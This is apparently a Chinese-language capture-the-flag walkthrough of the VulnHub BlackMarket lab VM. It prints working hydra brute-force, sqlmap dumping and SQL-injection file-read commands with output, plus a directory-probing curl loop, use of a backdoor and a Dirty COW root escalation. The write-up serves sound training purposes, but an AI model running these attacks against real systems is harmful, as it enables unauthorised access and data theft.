靶机渗透(blackmarket)

pentest

介绍

https://www.vulnhub.com/entry/blackmarket-1,223/ 然后靶机描述说有6个flag,每个flag都有hint... 个人感觉脑洞有点大...看的wp做的..

ip端口

ip:192.168.1.106 端口

flag1

去80端口 源码拿到flag1

1
flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

base解一下得到CIA - Operation Treadstone 搜了一下,发现是个电影....猜测要去找用户名爆破...懒得找了直接看wp了.... wp用的crew获取密码

1
cewl -w cewl.txt http://bourne.wikia.com/wiki/Operation_Treadstone

然后hydra爆破,不过爆破的是ftp,后面再说

flag3

回到80端口dirb一下

1
2
3
4
5
6
7
8
9
10
11
12
---- Scanning URL: http://192.168.1.106/ ----
==> DIRECTORY: http://192.168.1.106/admin/                                                                                           
==> DIRECTORY: http://192.168.1.106/css/                                                                                             
==> DIRECTORY: http://192.168.1.106/db/                                                                                              
==> DIRECTORY: http://192.168.1.106/dist/                                                                                            
+ http://192.168.1.106/index.php (CODE:200SIZE:2433)                                                                                
+ http://192.168.1.106/server-status (CODE:403SIZE:293)                                                                             
==> DIRECTORY: http://192.168.1.106/squirrelmail/                                                                                    
==> DIRECTORY: http://192.168.1.106/supplier/                                                                                        
==> DIRECTORY: http://192.168.1.106/upload/                                                                                          
==> DIRECTORY: http://192.168.1.106/user/                                                                                            
==> DIRECTORY: http://192.168.1.106/vendor/

登录页面hydra爆破一下,wp直接username就放三个用户名:user,supplier,admin....反正我不知道为什么想到这个...

1
2
3
4
5
6
7
8
9
blacsheep@kali:~$ hydra -L username.txt -P /home/blacsheep/Tools/WebSecurity/dict/passwords/common/Top196-probable.txt -e nsr -t 64 192.168.1.106 http-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-06 16:44:39
[DATA] max 64 tasks per 1 server, overall 64 tasks, 597 login tries (l:3/p:199), ~10 tries per task
[DATA] attacking http-post-form://192.168.1.106:80//login.php:username=^USER^&password=^PASS^:failed
[80][http-post-form] host: 192.168.1.106   login: supplier   password: supplier
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-10-06 16:44:51

拿到密码:supplier/supplier 登录上去 随手一测一个注入... sqlmap跑一下,真的跑的很慢...

1
sqlmap -u "http://192.168.1.106/supplier/edit_product.php?id=16" --cookie="PHPSESSID=ddqpnve2g6ptetfu39b5kdoj24" -o -D BlackMarket -T flag --dump

脱库太慢了,直接用别人的图了

flag2

发现注入可以读取文件,读/etc/passwd发现ftp用户nicky

1
2
3
4
5
6
root:x:0:0:root:/root:/bin/bash
...
dimitri:x:1000:1000:,,,:/home/dimitri:/bin/bash
jbourne:x:1001:1001::/var/www/html/jbourne:
nicky:x:1002:1002:,,,:/home/nicky:/bin/ftponly
ftp:x:112:120:ftp daemon,,,:/srv/ftp:/bin/false

hydra爆一下 登录进去发现文件下下来

flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy} If anyone reading this message it means you are on the right track however I do not have any idea about the CIA blackmarket Vehical workshop. You must find out and hack it!

flag2的hint:Congrats Proceed Further

flag4

admin界面有用户管理,修改密码处存在漏洞,可以指定用户修改,改掉id=1的用户 登录直接拿到flag 解一下,nothing is here

flag5

根据上条hint,登录一下邮箱(jbourne:?????) 拿到信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

HELLO Friend,

I have intercept the message from Russian's some how we are working on the same
direction, however, I couldn't able to decode the message. 

<Message Begins> 


Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl fhv
KzhhKzhh.qkt rm liwvi gl tvg zxxvhh.

</end>

https://quipqiup.com/解密拿到信息Everything is encrypted 试了一下凯撒,发现并不是,试了一个替换密码多给几个线索拿到明文

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to use PassPass.jpg in order to get access

flag6

这一步又很脑洞了... 访问workshop发现404 试了一下

1
for c in {a..z}; do printf "/${c}workshop/:%d\n" $(curl -s -w %{http_code} -o /dev/null 192.168.1.106/${c}workshop/); done

发现vworkshop为200,按前面的目录进去看下 strings一下拿到密码 解一下,拿到真实密码HailKGB 访问backdoor.php,发现404,但是页面不一样 发现其实有密码,post一下发现确实是后门 拿到flag6 flag6{Um9vdCB0aW1l} 解一下:Root time

提权

直接上脏牛 root密码变成了dirtyCowFun 登录上去拿到最后的flag